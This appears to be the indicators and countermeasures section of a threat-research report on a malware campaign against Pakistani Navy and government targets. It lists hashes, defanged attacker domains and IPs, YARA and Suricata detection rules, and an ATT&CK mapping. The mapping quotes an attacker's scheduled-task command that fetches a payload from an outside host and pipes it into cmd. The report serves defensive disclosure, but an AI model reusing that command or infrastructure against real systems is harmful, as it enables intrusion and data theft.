c0d62dea8d02d4fafbc298b7ed69cc93700078c3728e3a3acb88d2a2db91de40 | E-Sign.xpi.pnlo-kamra
8e54b06a4c9452c23d4c9858437ecb0e6ef0f7030b7ef70264289bd6179ad69f | Axigen_Thunderbird.zip
df8b7f0fe52fa86997f8d4e5c772ebdd1e84a247d678512a57bb198e6dd00ce8 | Axigen_Thunderbird.xpi
5f9ef1e419a66d3eb7bb9b1c71006987667121127ceb59a73d3139b0f98b7d3b | UserManual-Axigen.pdf
8021c3b1976805d4cec0ecc3e029cc7ba9616593b52dc3e94364645e9d99216b | NHQ letter dt 20 Aug 24(dpn).pdf
f0287134946a49e7dedc1ee60faab0e4ed7244201a5b744d00781a0e59e6bb80 | popup.js
54d3f21009acde870817cd42597447786f7c728183fa16966bdeebb1bc3c87e5 | KbUpdate.exe
615727e8ed031ca82ae1799893d7b42831f3ed86a1dbc5b4f654d2b5646808b5 | Tax_List1.accde
b40f8cf3a7a79eb65ef73df4e40d95c4c77596885a3fcfc0a6979961a26c0ba2 | 1.accde
736315462b91943de9df6210db3bb52564982dd6c758d06ea79e3a404548569b | C:\\$SYSTEMV0LUME1\\smsse.exe, smsse.exe
fc39ec35d767a2c0a178ca9874be8aaf87033f8b834ee8dcb57d3904516e4335 | GroupInsurance\\a.html, ForMinistryofPost/PostalOffice.html, GroupInsurance/a.html, PostalOffice.html
c31bf9075492dc093d0c76bd0b961e168c1804914edfca2c75ec09b2ce78ffdb | BenevolentFundGroupInsurance.zip
81dffcecb3f5765b7ec19cb72b2d10fb56c68a26b82f3fe8b2f5aa715561e666 | GroupInsurance.zip
11fdfdca21c73c87191fe7b80f1dc127253b52605aee17b9f65c3dc6ade369c0 | BenevolentFundAndGroupInsurance.zip, BenevolentFund.zip
5e119ecef481dd008a24c8c389b4b63362e387d55cee1c4eb1cff48bcda3153d | GroupInsurance\\GroupInsurance.txt.lnk, BenevolentFund.txt.lnk
3e35834b72b475952ae60ea8479ebe3638e204df414a838dfe143081f6729d8e | image.jpg


Network

Indicator | Purpose
paknavy[.]rf[.]gd | Staging malware
updateschedulers[.]com | Staging malware and credential harvesting
packageupdates[.]net | Sync-Scheduler C2
hxxps://paknavy[.]rf[.]gd/Axigen_Thunderbird.zip | Malicious Thunderbird extension URL
hxxps://updateschedulers[.]com/receive_credentials.php | Credential harvesting
hxxps://updateschedulers[.]com/file_download[.]php?lf=<OS tag> | OS-specific payload delivery (lf is WIN, Mac, LIN, And, WP or iOS)
hxxps://finance-gov-pk[.]rf[.]gd/BenevolentFundAndGroupInsurance | Malicious Zip Archive URL
hxxps://updateschedulers[.]com/image.jpg | Sync-Scheduler URL
hxxp://packageupdates[.]net/r3diRecT/redirector/proxy[.]php | Exfiltration C2 and Redirector
hxxps://updateschedulers[.]com/BenevolentFund[.]pdf | Lure document
hxxps://extension.webmailmigration[.]com/ajaxtension[.]php | Credential harvesting
mxmediasolutions[.]com | Staging malware
185[.]27[.]134[.]139 | Last serving IP for paknavy[.]rf[.]gd
185[.]227[.]82[.]38 | Last serving IP for updateschedulers[.]com
146[.]70[.]149[.]223 | IP address resolution for packageupdates[.]net
146[.]70[.]149[.]216 | IP address resolution for packageupdates[.]net
185[.]227[.]82[.]65 | Black-Shell C2
146[.]70[.]80[.]58 | Sync-Scheduler C2


Other

Name | Description
C:\\Users\\user\\source\\repos\\MW-PAK-DataExt-Win\\x64\\Release\\MW-PAK-DataExt-Win.pdb | PDB Path
C:\\Users\\user\\source\\repos\\MW-BLACK-Shell\\x64\\Release\\MW-BLACK-Shell.pdb | PDB Path
C:\\Users\\user\\Documents\\Project-M\\Visual Studio\\MW-NEW_TELEMETRY-ExE\\x64\\Release\\MW-NEW_TELEMETRY-ExE.pdb | PDB Path
C:\\Users\\<user>\\AppData\\Roaming\\System | Staging Directory
C:\\Users\\<user>\\AppData\\Roaming\\FileRegistry\\Registry.log | Log File
MTX | Mutex Name


Countermeasures

YARA Rule

rule targeted_SyncScheduler_Malware {
    meta:
        description = "Rule detecting Sync-Scheduler malware used for extracting documents"
        author = "The Arctic Wolf Labs team"
        distribution = "TLP:AMBER+STRICT"
        date = "2024-10-21"
        version = "1.0"         

    strings:
        $a1 = "docx" ascii wide
        $a2 = "xlsx" ascii wide
        $a3 = "pptx" ascii wide
        $a4 = "POST"
        $a5 = "C:/Users/All Users" ascii wide
        $a6 = "C:/Users/Default" ascii wide
        $a7 = "C:/Users/Public" ascii wide
        $a8 = "ReadFile" ascii
        $a9 = "CreateMutexA" ascii
        $a10 = "GetConsoleWindow" ascii
        $b1 = "Content-Type: application/x-www-form-urlencoded"
        $b2 = "SELECT * FROM Win32_ComputerSystemProduct"

    condition:
        uint16(0) == 0x5a4d and all of ($a*) and 1 of ($b*)
}

Suricata Rule

alert http $HOME_NET any -> $EXTERNAL_NET any ( msg:"MALWARE: Sync-Scheduler Document Stealer POST request"; content:"POST"; http_method; flow:to_server,established; content:"proxy|2e|php"; nocase; http_uri; content:"uD="; nocase; http_client_body; content:"xifangtaiyang="; nocase; http_client_body; priority:1; sid:2051843; rev:1; )


MITRE ATT&CK® Mapping

Tactic | Technique / Sub-Technique | Context
Reconnaissance | Gather Victim Host Information: Software (T1592.002) | The threat actor leveraged prior knowledge of the target organization’s reliance on Axigen mail servers and the Thunderbird email client to design customized phishing lures and tools that would resonate with these specific systems and increase the likelihood of successful infiltration.
Resource Development | Develop Capabilities: Malware (T1587.001) | The threat actor used custom malware tailored to their specific operational objectives, including Sync-Scheduler, Black-Shell and downloaders.
Resource Development | Stage Capabilities: Upload Malware (T1608.001) | Malware was staged on adversary-controlled infrastructure designed to appear legitimate, facilitating multiple stages of the execution chain.
Initial Access | Phishing: Spearphishing Link (T1566.002) | The adversary distributed PDFs containing malicious links intended to deliver an initial Zip archive: hxxps://paknavy[.]rf[.]gd/Axigen_Thunderbird.zip and hxxps://finance-gov-pk[.]rf[.]gd/BenevolentFundAndGroupInsurance.
Execution | Command and Scripting Interpreter: JavaScript (T1059.007) | The threat actor utilized obfuscated JavaScript within the malicious extension file to harvest credentials and deploy the infostealer Sync-Scheduler.
Execution | Command and Scripting Interpreter: Windows Command Shell (T1059.003) | cmd.exe /c is used to create scheduled tasks in both Black-Shell and Sync-Scheduler.
Execution | Inter-Process Communication: Component Object Model (T1559.001) | Sync-Scheduler uses the IWbemLocator COM interface (CLSID: 4590F811-1D3A-11D0-891F-00AA004B2E24) to execute the WMI query SELECT * FROM Win32_ComputerSystemProduct and gather the system’s unique UUID.
Execution | Native API (T1106) | Sync-Scheduler uses multiple dynamically resolved API calls, including VirtualAlloc, InternetOpenA, InternetConnectA, HttpOpenRequestA, HttpAddRequestHeadersA, HttpSendRequestW, InternetReadFile, InternetCloseHandle, InternetSetOptionA, FindFirstFileW, FindNextFileW, FreeLibrary and CreateProcessA.
Execution, Persistence | Scheduled Task/Job: Scheduled Task (T1053.005) | Sync-Scheduler and Black-Shell both create scheduled tasks named OneDrive, Skype and WindowsUpdate using schtasks /create to run cmd.exe.
Execution, Persistence | Scheduled Task/Job: Scheduled Task (T1053.005) | The threat actor utilized a Microsoft Access file to execute: cmd.exe /c schtasks /create /tn EdgeUpdateTaskMachine /f /sc minute /mo 14 /tr "conhost.exe --headless cmd /c curl -o C:\\Users\\public\\documents\\pic.jpg mxmediasolutions[.]com/addc.php?mg=%computername%_%username% & more C:\\Users\\public\\documents\\pic.jpg | cmd"
Execution | User Execution: Malicious Link (T1204.001) | The adversary lures victims into clicking hyperlinks to deliver malicious files.
Execution | User Execution: Malicious File (T1204.002) | The malicious extension files require the user to manually install them into the Thunderbird email client. Employee-Information-Pak-Navy-2024.exe (Sync-Scheduler) relies on the victim to execute the file.
Execution | Windows Management Instrumentation (T1047) | Sync-Scheduler uses IWbemLocator to execute SELECT * FROM Win32_ComputerSystemProduct and gather the system’s unique UUID.
Execution | Shared Modules (T1129) | Sync-Scheduler uses LdrLoadDll to load Wininet.dll.
Defense Evasion | Deobfuscate/Decode Files or Information (T1140) | Sync-Scheduler uses XOR operations to decrypt strings at runtime to avoid detection.
Defense Evasion | Deobfuscate/Decode Files or Information (T1140) | The adversary leveraged the atob() function to decode its C2 address from Base64 within the malicious extension file.
Defense Evasion | Impersonation (T1656) | The adversary impersonated key personnel within the Pakistan Navy and Government to deceive targets into downloading malware.
Defense Evasion | Masquerading: Masquerade Task or Service (T1036.004) | The adversary created scheduled tasks named after common Windows software (OneDrive, Skype, WindowsUpdate and EdgeUpdateTaskMachine) to blend in with legitimate system tasks and avoid detection.
Defense Evasion | Masquerading: Masquerade File Type (T1036.008) | Employee-Information-Pak-Navy-2024.exe was disguised as an Excel file.
Defense Evasion | Obfuscated Files or Information: Dynamic API Resolution (T1027.007) | The adversary used dynamic API resolution to conceal malware characteristics and functionality.
Defense Evasion | Obfuscated Files or Information: Encrypted/Encoded File (T1027.013) | Sync-Scheduler encrypts the contents of the files it collects with the Tiny Encryption Algorithm (TEA) prior to exfiltration to packageupdates[.]net.
Credential Access, Collection | Input Capture: GUI Input Capture (T1056.002) | The adversary used a deceptive login form packaged inside a Thunderbird extension file to mimic legitimate input fields, capturing user credentials and sending them to a remote C2 server.
Discovery | File and Directory Discovery (T1083) | Sync-Scheduler enumerates the victim’s filesystem for files matching the following extensions: .doc, .docx, .pdf, .zip, .xls, .xlsx, .ppt, .pptx.
Collection | Automatic Collection (T1119) | Once executed, Sync-Scheduler automatically collects, encrypts and exfiltrates files to packageupdates[.]net.
Collection | Data Staged: Local Data Staging (T1074.001) | Employee-Information-Pak-Navy-2024.exe used the folder AppData\\Roaming\\System to stage encrypted files for exfiltration.
Command and Control | Application Layer Protocol: Web Protocols (T1071.001) | Sync-Scheduler uses HTTP to communicate with its C2 server.
Exfiltration | Exfiltration Over C2 Channel (T1041) | Sync-Scheduler exfiltrates TEA-encrypted files to the C2 server.


About Arctic Wolf Labs

Arctic Wolf Labs is a group of elite security researchers, data scientists, and security development engineers who explore security topics to deliver cutting-edge threat research on new and emerging adversaries, develop and refine advanced threat detection models with artificial intelligence and machine learning, and drive continuous improvement in the speed, scale, and detection efficacy of Arctic Wolf’s solution offerings.

Arctic Wolf Labs brings world-class security innovations to not only Arctic Wolf’s customer base, but the security community at large.


This article was originally posted on the BlackBerry® blog on November 18th, 2024. Arctic Wolf acquired Cylance® from BlackBerry in February 2025. CylanceENDPOINT is now part of Arctic Wolf® Aurora™ Endpoint Defense. The BlackBerry Research and Intelligence team is now part of the Arctic Wolf® Labs team.
